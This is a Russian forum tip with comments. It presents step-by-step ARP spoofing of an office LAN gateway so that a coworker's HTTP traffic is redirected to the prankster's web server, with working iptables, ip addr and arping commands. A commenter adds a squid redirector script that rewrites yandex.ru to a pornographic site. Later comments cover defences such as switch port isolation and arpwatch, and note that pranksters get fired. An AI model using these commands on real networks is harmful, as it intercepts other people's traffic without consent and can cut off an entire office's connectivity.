Используя нехитрые манипуляции в Linux можно подшутить или удивить соседа по офису, например отобразив персональное поздравление при попытке открыть соседом какой-нибудь известного ресурса. Манипуляции проделываются без изменения конфигурации шлюза, путем поднятия web-сервера на своей машине и перенаправление на него запросов, через подмену ARP-адреса шлюза в кэше на машине соседа. Техника действует только в пределах локальной сети.Включаем на своей машине перенаправление IP-пакетов:
echo 1 > /proc/sys/net/ipv4/ip_forward
Перенаправляем запросы на 80-порт, заменив адрес назначения в пакете на 192.168.1.200 - локальный IP машины с подставным шлюзом. На локальной машине должен быть заблаговременно поднят http-сервер с нужной страницей.
iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200
Добавляем адрес реального шлюза (192.168.1.1) на сетевой интерфейс:
ip addr add 192.168.1.1/24 dev eth0
Анонсируем смену MAC-адреса шлюза:
arping -c 3 -A -I eth0 192.168.1.1
После завершения розыгрыша убираем IP шлюза с локального интерфейса:
ip addr delete 192.168.1.1/24 dev eth0
iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200
ifconfig eth0 down
ifconfig eth0 up
arp -d 192.168.1.1Внимание, описанное действие не следует применять в рабочей сети предприятия, так как подстановка шлюза на время блокирует работу сети из-за конфликта с реальным шлюзом.
URL: http://blog.ksplice.com/2010/09/hijacking-http-traffic-on-yo.../
Обсуждается: http://www.opennet.me/tips/info/2450.shtml
На предприятиях очень часто в интернет через прокси выходят.
Да собственно... Почему бы не поднять squid вместо вебсервака :)url_rewrite_program redirector.pl
#!/usr/bin/perl
$|=1;
while (<>) {
s@http://www.yandex.ru@http://www.spankwire.com@;
print;
}Весь офис будет рад :)
или вот эту хрень http://squirm.foote.com.au/ прикрутить.
наверное подделать популярные зоны в бинде и засунуть розыгрываемого во view было бы более safe
Это требует доступа к bind.
> Это требует доступа к bind.Да-да... Или отдельного "полезного" совета ""Подстановка DNS-трафика определенному компьютеру в локальной сети"".
>> Это требует доступа к bind.
> Да-да... Или отдельного "полезного" совета ""Подстановка DNS-трафика определенному компьютеру
> в локальной сети"".:))
Но так или иначе будет применяться скорее всего arp-спуфинг, что приведёт к тем же минусам. ;)
Ога, главное всё сделать пока админ не пришол :)
P.S.
"через подмену ARP-адреса шлюза в кэше на машине соседа."
как это реализовать если нет доступа к машине соседа?
P.S.S.
Это работоспособно при включеном шлюзе?
Почитайте как работает ARP-кэш. Может снизойдет озарение. Добавлю только, что "подменой" надо заниматься как минимум раз в 30 секунд (анонсировать изменение МАК-адреса шлюза).
"How to pwn your corporate network for dummies" :-)
шлюз будет недоволен, а за ним и админ
В нормально настроенной сети это не провернуть. И вообще, мануал из серии "как делать не надо, чтобы выжить"
> В нормально настроенной сети это не провернуть. И вообще, мануал из серии
> "как делать не надо, чтобы выжить"Ну что такое "нормально настроенная сеть"? Есть вот два cisco-выз свитча, в который втыкается соотвественно два клиента, но работают оба через один и тот же vlan. Что помешает данному хаку? Или что в данной сети настроено не "нормально"?
Помешает switchport protected. За каким чертом двум клиентским компам в рабочей обстановке общаться между собой? Правильно, незачем. А если файлы друг-другу захотят передать - для этого используется корпоративная почта/ftp.
> Помешает switchport protected. За каким чертом двум клиентским компам в рабочей обстановке
> общаться между собой? Правильно, незачем. А если файлы друг-другу захотят передать
> - для этого используется корпоративная почта/ftp.Ну в разных подразделениях разных контор - по-разному. Например, в МИФИ нет корпоративного FTP. Почему? Гос. контора, там всё очень сложно.
Вот взять например моё помещение. В моём помещении стоит одна циска, а в помещении напротив - другая. Там и там работают люди из одного отдела и плотно друг с другом взаимодействуют. Дак вот не вижу смысл запрещать заходить по ssh ко мне с соседнего компьютера (только с моего компьютера можно без затрат большого кол-ва времени достучаться до некоторых ресурсов, а бегать между своим компом и соседним помещенгием тоже не хочется). Тем более, т.к. достаточно проблематично выбить сервер, нередко приходится в качестве тестового компьютера использовать свой рабочий, из-за чего он нередко выступает в роли малого тестового _сервера_.
Ну или взять общежитие МИФИ. Там студенты свободно обмениваются трафиков. Или вы считаете, что нормальной настройкой студенческой сети - это запретить им общаться друг с другом? Я считаю что это нельзя делать как и из этических соображений, так и из материальных, ибо, например, тот же "retracker.local" в локальной сети экономит нехилый процент канала в Интернет.
P.S.: В общежитии на один vlan приходится около 50 студентов.
>[оверквотинг удален]
> до некоторых ресурсов, а бегать между своим компом и соседним помещенгием
> тоже не хочется). Тем более, т.к. достаточно проблематично выбить сервер, нередко
> приходится в качестве тестового компьютера использовать свой рабочий, из-за чего он
> нередко выступает в роли малого тестового _сервера_.
> Ну или взять общежитие МИФИ. Там студенты свободно обмениваются трафиков. Или вы
> считаете, что нормальной настройкой студенческой сети - это запретить им общаться
> друг с другом? Я считаю что это нельзя делать как и
> из этических соображений, так и из материальных, ибо, например, тот же
> "retracker.local" в локальной сети экономит нехилый процент канала в Интернет.
> P.S.: В общежитии на один vlan приходится около 50 студентов.Извините, но начиналось все с соседа по офису, т.е. речь об организации, которая деньги зарабатывает. Студенческая сеть, конечно, совсем другое дело.
> Извините, но начиналось все с соседа по офису, т.е. речь об организации,
> которая деньги зарабатывает. Студенческая сеть, конечно, совсем другое дело.Это я извиняюсь, забыл некоторые элементы основного сообщения. Но пример с моим рабочим помещением остаётся в силе :)
> Это я извиняюсь, забыл некоторые элементы основного сообщения. Но пример с моим
> рабочим помещением остаётся в силе :)Откройте для себя L3-уровень. И прочитайте - что такое маршрутизация. VLAN, как известно - L2.
Кстати говоря, хорошо настроенный и отфильтрованный L2 иногда поудобнее L3 бывает-с.
>> Это я извиняюсь, забыл некоторые элементы основного сообщения. Но пример с моим
>> рабочим помещением остаётся в силе :)
> Откройте для себя L3-уровень. И прочитайте - что такое маршрутизация. VLAN,
> как известно - L2.Я знаю что такое маршрутизация, и знаю где L2, а где L3. И что вы предлагаете? Зарание скажу, что в организации количество клиентов по порядку величины соотвествует десятку тысяч.
Тут несколько сотен VLAN-ов в VTP-домене, детерменируемых на шеститысячнике. И "маршрутизация" во всю используется :)
> Тут несколько сотен VLAN-ов в VTP-домене, детерменируемых на шеститысячнике.Наверное все-таки "терминируемых". :)
> И "маршрутизация" во всю используется :)
Ну дык - а в чем тогда проблема? Для доступа к компьютерам в другом влане используется маршрутизация (SVI или IP unnumbered - не суть важно).
>> Тут несколько сотен VLAN-ов в VTP-домене, детерменируемых на шеститысячнике.
> Наверное все-таки "терминируемых". :)Упс. Бывает :). Перечитал научно-популярного чтива на тему детерминирована ли наша Вселенная, в то время как термин "терминируемые" относительно vlan-ов использовал в своей жизни считанное кол-во раз :)
>> И "маршрутизация" во всю используется :)
> Ну дык - а в чем тогда проблема? Для доступа к
> компьютерам в другом влане используется маршрутизация (SVI или IP unnumbered -
> не суть важно).Я честно сказать не цисковод, и что есть перечисленные термины могу представить только смутно. Разве что я так понимаю, это какие-то технологии для объедидения vlan-ов. И честно сказать не очень понимаю смысл таких велосипедов, особенно когда идёт речь о vlan-е сотрудников _одного_ отдела. Тем более как я уже сказал ранее, тут клиенты измеряются тысячами и если в данных технологиях требуется на каждого заводить свой vlan, то эта технология мягко говоря неприемлема, т.к. тут исторически используется единый VTP-домен, а большенство цисок и так уже скоро будут переполнены vlan-ами. Да и адресное пространство, не предётся ли на каждого клиента заводить свою подсеть со своим шлюзом? Опять же, если это так, то это опять же неприемлемо. Да и если уж на то пошло, то есл кто-то и захочет устроить саботаж, то вряд ли ему это помешает (по крайней мере в моём случае, т.к. работаю я в отделе телекоммуникаций хоть и занимаюсь серверами, а не сетью). :)
Однако если вам не лень рассказать, я буду рад послушать, что умеют данные технологии и как их можно применить.
Да не в этом дело. Можно хоть на каждого сотрудника заводить VLAN. И они будут друг друга прекрасно "видеть" по сети. Вот о чем я говорил выше. :) Кстати, технология VLAN per user - используется у нас - я у провайдера местного работаю. Очень надежная технология. Терминация VLAN-IP делается на цисках (6-тонниках и 2950). Если юзверь поменяет себе IP (что актуально в сетях домовых провайдеров) - фиг у него будет сеть работать. :) Просто и надежно. Хотя и влечет за собой довольно большие накладные расходы - как финансовые (применение только управляемых свичей, ограничение количества VLAN на кошках), так и организационные (необходимо вести базу вланов и назначать их - с последующим прописыванием на цисках).
> - для этого используется корпоративная почта/ftp.Только они имеют такое нехорошее свойство - место там заканчиватся почему-то. И даже довольно быстро. А если сервак нагибается - вся контора дружно курит бамбук, радуясь халяве. Поэтому обычно в реалных Ынтерпрайзах используются и ресурсы клиенских машин по мере необходимости.
>> - для этого используется корпоративная почта/ftp.
> Только они имеют такое нехорошее свойство - место там заканчиватся почему-то. И
> даже довольно быстро. А если сервак нагибается - вся контора дружно
> курит бамбук, радуясь халяве. Поэтому обычно в реалных Ынтерпрайзах используются и
> ресурсы клиенских машин по мере необходимости.Ну, любой сервер может нагнуться, так что в "реальных Ынтерпрайзах" приходится заниматься еще и отказоустойчивостью :) В любом случае сервер лучше - через него можно вести реальный контроль кто-что-куда, а не сидеть в ожидании чуда, пока коллеги друг другу вирусы рассылают :)
>> - для этого используется корпоративная почта/ftp.
> Только они имеют такое нехорошее свойство - место там заканчиватся почему-то. И
> даже довольно быстро.Ну у вас и аргументы, уважаемый =)
Не, ну правда - подсистемы хранения сейчас относительно дешевы.
Если предприятие такое большое, что документы забивают терабайты, то на 4 sas винта в raid10 + контроллер e200 деньги найдутся.
А если хочется дешево и сердито, то дешевый рейд10 контроллер и 4 sata винта выходят вообще недорого)
> А если хочется дешево и сердито, то дешевый рейд10 контроллер и 4
> sata винта выходят вообще недорого)Ну да. А потом у таких умников нагибается сервант (любая железка может сломаться) и вся контора радостно курит бамбук. Знаем мы эти совковые Ынтерпрайзы, где на эффективность и безгеморность работы сотрудников всем класть с прибором, зато какойнить бзик по части "как бы чего не сперли" или какой там еще фигне. При том кому надо - все-равно успешно все прут, зато когда централизованный сервак дает дуба - толпа народа радостно курит бамбук а админы срут кирпичами :). ИМХО зависимость работы всей конторы от 1 сервера - зло. Так, глядя на то какой пипец начинается когда сервак подыхает :)
Алсо нынче в моде например виртуализация. Представляете себе если програмеры/тестеры/прочий сброд начнут какиенить там временные тестовые виртуалки на много мегазов а то и гигазов каждая на фтпушник лить? И ессно забудут стирать. А на квоты периодически брыкаться когда они работе мешают. И насколько таким макаром места и терпения куль-одминов хватит? :) Вообще, вы имхо по сути извращаетесь, делая из быстрой swiched сети не то что даже более медленную routed, а даже коммутируемую на уровне примерно так L7 сеть. При том "коммутатором" получается фтпушник. Что вообще-то слегка изврат - тормозно и грабельно. Как минимум *удваивается* время на передачу файла по сравнению с шарингом файла напрямую с машины юзера. Для жирных файлов это вообще-то Ж.
Чет вас понесло.
Личный негативный опыт?)
Ну, как вариант - APR-кэш может быть сформирован статиком. :) Или где-нить в сети будет стоять arpwatch. Который будет дико материться, обнаружив подобную ситуацию.
Фуууу ... мой arpwatch тихо и интеллигентно залогирует факт, отправит мне письмо да и заблокирует порт на свиче :)Как делать? - гугл завалит вариантами ...
Под словом "материться" я как раз таки и не имел в виду "расстрел на месте". :) Обычного логгирования вполне себе достаточно.
Не дядя Фёдор - недостаточно!
Оно необходимо, но недостаточно. Тут нужны более активные действия. Просемафорить админу, задрать аларм в NMS ... У менея же порешили что и порт блокировать - вполне резонно. Пока ни одного шутника не уволили ибо шутка получается против себя :)
> Оно необходимо, но недостаточно. Тут нужны более активные действия. Просемафорить админу,
> задрать аларм в NMS ... У менея же порешили что и
> порт блокировать - вполне резонно. Пока ни одного шутника не уволили
> ибо шутка получается против себя :)Ну это уже зависит от уровня "фашизма" админа. :) Во многих случаях вполне обоснованного.
за такие "шутки" шутник обычно увольняется сходу..
>Внимание, описанное действие не следует применять в рабочей сети предприятия, так как подстановка шлюза на время блокирует работу сети из-за конфликта с реальным шлюзом.Т.е. у всего отдела (или конторы) "внезапно" пропадет интернет.
Такого вообще не нужно делать, ни дома, ни на работе.> за такие "шутки" шутник обычно увольняется сходу..
Вот-вот.
Ну или наказывается так, чтобы отбило охоту тратить оплачиваемое время на создание препятствий производственному процессу других людей.
шутка удается с первыми лицами предприятия (и до них это доходит) - админ идет искать работу
> шутка удается с первыми лицами предприятия (и до них это доходит) -
> админ идет искать работуНе совсем так, если первые лица предприятия смогут провернуть такую шутку, админ админящий такую сетку пойдет искать работу.
>> шутка удается с первыми лицами предприятия (и до них это доходит) -
>> админ идет искать работу
> Не совсем так, если первые лица предприятия смогут провернуть такую шутку, админ
> админящий такую сетку пойдет искать работу.может они просто поменяются местами тогда уж?